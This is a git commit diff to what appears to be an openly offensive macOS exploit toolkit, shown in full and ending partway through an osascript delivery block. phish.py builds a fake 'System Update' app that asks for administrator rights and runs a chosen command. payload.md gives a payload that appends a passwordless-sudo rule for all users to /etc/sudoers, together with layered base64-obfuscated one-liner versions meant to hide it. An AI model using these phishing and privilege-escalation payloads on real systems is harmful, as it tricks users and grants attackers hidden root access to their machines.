1.2.1

thehappydinoa · thehappydinoa · commit b86e0ee76b81 · 2019-03-10T11:57:03.000-04:00
diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -4,7 +4,6 @@ about: Create a report to help us improve
 title: ''
 labels: bug
 assignees: ''
-
 ---
 
 **Describe the bug**
@@ -14,9 +13,10 @@ A clear and concise description of what the bug is.
 If applicable, add screenshots to help explain your problem.
 
 **Info (please complete the following information):**
- - macOS Version [e.g. 10.14.3]
- - Version [e.g. 1.1.0]
- - Exploit [e.g. exploits.phish]
+
+-   macOS Version [e.g. 10.14.3]
+-   Version [e.g. 1.2.0]
+-   Exploit [e.g. exploits.phish]
 
 **Additional context**
 Add any other context about the problem here.
diff --git a/exploits/__init__.py b/exploits/__init__.py
@@ -1,6 +1,5 @@
 import glob
 import os
 
-not_exploits = ["__init__.py", "general.py"]
 __all__ = [os.path.basename(f)[:-3] for f in glob.glob(os.path.join(os.path.dirname(
-    __file__), "*.py")) if not f in not_exploits]
+    __file__), "*.py")) if not f in ["__init__.py", "general.py"]]
diff --git a/exploits/general.py b/exploits/general.py
@@ -27,6 +27,7 @@ def default_browser():
             return handler.get("LSHandlerRoleAll")
     return
 
+
 def app_installed(app_name):
     """check if app installed"""
     return os.path.isdir("/Applications/" + app_name) or os.path.isdir("~/Applications/" + app_name)
diff --git a/exploits/phish.py b/exploits/phish.py
@@ -45,11 +45,10 @@ def admin_prompt(app=None, icon_path=None, prompt="System Update", command="echo
             info["CFBundleIdentifier"] = "com.apple.ScriptEditor.id." + \
                 prompt.replace(" ", "")
             plistlib.writePlist(info, plist)
-            print(os.system(
-                "cp \"{icon_path}\" \"{app_path}/Contents/Resources/applet.icns\"; touch {app_path};".format(icon_path=full_app_path + icon_path, app_path=app_path)))
+            os.system(
+                "cp \"{icon_path}\" \"{app_path}/Contents/Resources/applet.icns\"; touch {app_path};".format(icon_path=full_app_path + icon_path, app_path=app_path))
             payload = """open {app_path} --args "{command}; echo {success}" "{prompt}" """.format(
                 app_path=app_path, prompt=prompt, command=command.replace('"', '\"'), success=rand)
-            # print(payload)  # Debugging
             os.system(payload)
             print("Application Launched...")
             return True
diff --git a/payload.md b/payload.md
@@ -1,53 +1,64 @@
 # Payload
 
 ## Part 1
+
 ```python
 if os.getuid() == 0: os.system('echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers')
 else: print("User is not root")
 ```
 
 ## Part 1 base64
+
 ```python
 if os.getuid() == 0: os.system(base64.b64decode('ZWNobyAiQUxMIEFMTD0oQUxMKSBOT1BBU1NXRDogQUxMIiA+PiAvZXRjL3N1ZG9lcnM='))
 else: print(base64.b64decode('VXNlciBpcyBub3Qgcm9vdA=='))
 ```
 
 ## Part 2
+
 ```python
 import base64, os; exec(base64.b64decode('aWYgb3MuZ2V0dWlkKCkgPT0gMDogb3Muc3lzdGVtKGJhc2U2NC5iNjRkZWNvZGUoJ1pXTm9ieUFpUVV4TUlFRk1URDBvUVV4TUtTQk9UMUJCVTFOWFJEb2dRVXhNSWlBK1BpQXZaWFJqTDNOMVpHOWxjbk09JykpDQplbHNlOiBwcmludChiYXNlNjQuYjY0ZGVjb2RlKCdWWE5sY2lCcGN5QnViM1FnY205dmRBPT0nKSk='))
 ```
 
 ## Part 3
+
 ```python
 python -c "$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtHSmhjMlUyTkM1aU5qUmtaV052WkdVb0oxcFhUbTlpZVVGcFVWVjRUVWxGUmsxVVJEQnZVVlY0VFV0VFFrOVVNVUpDVlRGT1dGSkViMmRSVlhoTlNXbEJLMUJwUVhaYVdGSnFURE5PTVZwSE9XeGpiazA5SnlrcERRcGxiSE5sT2lCd2NtbHVkQ2hpWVhObE5qUXVZalkwWkdWamIyUmxLQ2RXV0U1c1kybENjR041UW5WaU0xRm5ZMjA1ZG1SQlBUMG5LU2s9Jykp | base64 -D)"
 ```
+
 or
+
 ```bash
 python -c \"$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtHSmhjMlUyTkM1aU5qUmtaV052WkdVb0oxcFhUbTlpZVVGcFVWVjRUVWxGUmsxVVJEQnZVVlY0VFV0VFFrOVVNVUpDVlRGT1dGSkViMmRSVlhoTlNXbEJLMUJwUVhaYVdGSnFURE5PTVZwSE9XeGpiazA5SnlrcERRcGxiSE5sT2lCd2NtbHVkQ2hpWVhObE5qUXVZalkwWkdWamIyUmxLQ2RXV0U1c1kybENjR041UW5WaU0xRm5ZMjA1ZG1SQlBUMG5LU2s9Jykp | base64 -D)\"
 ```
 
-
 ## Modified Part 1
+
 ```python
 if os.getuid() == 0: os.system('echo "ALL ALL=(ALL) NOPASSWD: ALL" >> test.log; echo echoed')
 else: print("User is not root")
 ```
 
 ## Modified Part 2
+
 ```python
 import base64, os; exec(base64.b64decode('aWYgb3MuZ2V0dWlkKCkgPT0gMDogb3Muc3lzdGVtKCdlY2hvICJBTEwgQUxMPShBTEwpIE5PUEFTU1dEOiBBTEwiID4+IHRlc3QubG9nOyBlY2hvIGVjaG9lZCcpDQplbHNlOiBwcmludCgiVXNlciBpcyBub3Qgcm9vdCIp'))
 ```
 
 ## Modified Part 3
+
 ```python
 python -c "$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtDZGxZMmh2SUNKQlRFd2dRVXhNUFNoQlRFd3BJRTVQVUVGVFUxZEVPaUJCVEV3aUlENCtJSFJsYzNRdWJHOW5PeUJsWTJodklHVmphRzlsWkNjcERRcGxiSE5sT2lCd2NtbHVkQ2dpVlhObGNpQnBjeUJ1YjNRZ2NtOXZkQ0lwJykp | base64 -D)"
 ```
+
 or
+
 ```bash
 python -c \"$(echo aW1wb3J0IGJhc2U2NCwgb3M7IGV4ZWMoYmFzZTY0LmI2NGRlY29kZSgnYVdZZ2IzTXVaMlYwZFdsa0tDa2dQVDBnTURvZ2IzTXVjM2x6ZEdWdEtDZGxZMmh2SUNKQlRFd2dRVXhNUFNoQlRFd3BJRTVQVUVGVFUxZEVPaUJCVEV3aUlENCtJSFJsYzNRdWJHOW5PeUJsWTJodklHVmphRzlsWkNjcERRcGxiSE5sT2lCd2NtbHVkQ2dpVlhObGNpQnBjeUJ1YjNRZ2NtOXZkQ0lwJykp | base64 -D)\"
 ```
 
 ## Delivery
+
 ```bash
 osascript <<END
     set command to "{command}"
